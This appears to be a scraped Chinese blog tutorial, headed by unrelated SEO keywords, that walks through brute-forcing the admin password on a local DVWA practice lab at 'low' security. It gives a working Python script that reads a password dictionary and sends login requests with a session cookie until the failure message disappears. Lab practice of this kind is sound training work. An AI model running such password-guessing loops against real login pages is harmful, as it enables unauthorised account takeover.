2026/4/23 19:56:47
网站建设
项目流程
政务网站建设的功能模块,潍坊seo计费,百度官网登录入口手机版,asp网站后台密码文件实战#xff1a;DVWA靶场靶场设置#xff1a;low级别判断是否登录成功#xff1a;看返回的http请求里面是否有Username and/or password incorrect.我们这里假设知道用户名是admin不知道密码#xff0c;要去破解密码思路#xff1a;#xff08;1#xff09;从字典读取值…实战DVWA靶场靶场设置low级别判断是否登录成功看返回的http请求里面是否有Username and/or password incorrect.我们这里假设知道用户名是admin不知道密码要去破解密码思路1从字典读取值生成密码pwds open(password.txt) for pwd in pwds: print(pwd) pwds.close()2http连接到需要爆破的地址按F12查看标头把你的PHPSEEEIONID复制到代码修改就可以代码import requests # 如果第一个密码就提示成功是 PHPSESSID 没有替换的问题 pwds open(F:\\password.txt) for pwd in pwds: url http://localhost/dvwa/vulnerabilities/brute/ # PHPSESSID务必替换为登录以后的PHPSESSID resp requests.get(url url, params {username:admin, password:pwd.strip(), Login:Login}, headers {Cookie:securitylow; PHPSESSID13hjf2259tmmq16ukv2kdc59g6}) #print(resp.text) if Username and/or password incorrect. in resp.text: print(破解失败pwd, end) else: print(破解成功pwd, end) break; pwds.close()3获得http响应分析响应结果看看有没有错误提示“Username and/or password incorrect.”4如果有提示就继续下一次循环5如果没有就代表爆破成功破解成功登录用户名admin密码password登录成功